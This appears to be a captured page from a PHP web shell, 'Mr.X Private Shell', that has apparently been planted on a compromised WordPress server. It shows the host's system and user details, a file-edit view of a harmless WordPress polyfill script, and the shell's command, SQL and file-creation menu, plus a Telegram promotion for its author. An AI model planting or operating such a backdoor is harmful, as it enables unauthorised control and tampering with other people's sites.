Uname: Linux server.digisquadtech.com 4.18.0-553.100.1.el8_10.x86_64 #1 SMP Mon Feb 2 04:13:33 EST 2026 x86_64
User: 1091 (madhavfluid)
Group: 1090 (madhavfluid)
Disabled functions: NONE
Safe mode: On[ PHPinfo ]
//home/madhavfluid/public_html/wp-includes/js/dist/vendor      ( Reset | Go to )
File Name: wp-polyfill-node-contains.js
Edit

// Node.prototype.contains
(function() {

    function contains(node) {
        if (!(0 in arguments)) {
            throw new TypeError('1 argument is required');
        }

        do {
            if (this === node) {
                return true;
            }
        // eslint-disable-next-line no-cond-assign
        } while (node = node && node.parentNode);

        return false;
    }

    // IE
    if ('HTMLElement' in self && 'contains' in HTMLElement.prototype) {
        try {
            delete HTMLElement.prototype.contains;
        // eslint-disable-next-line no-empty
        } catch (e) {}
    }

    if ('Node' in self) {
        Node.prototype.contains = contains;
    } else {
        document.contains = Element.prototype.contains = contains;
    }

}());

All system for education purposes only. For more tools: Telegram @jackleet

Mr.X Private Shell

Logo
-
New File | New Folder
Command
SQL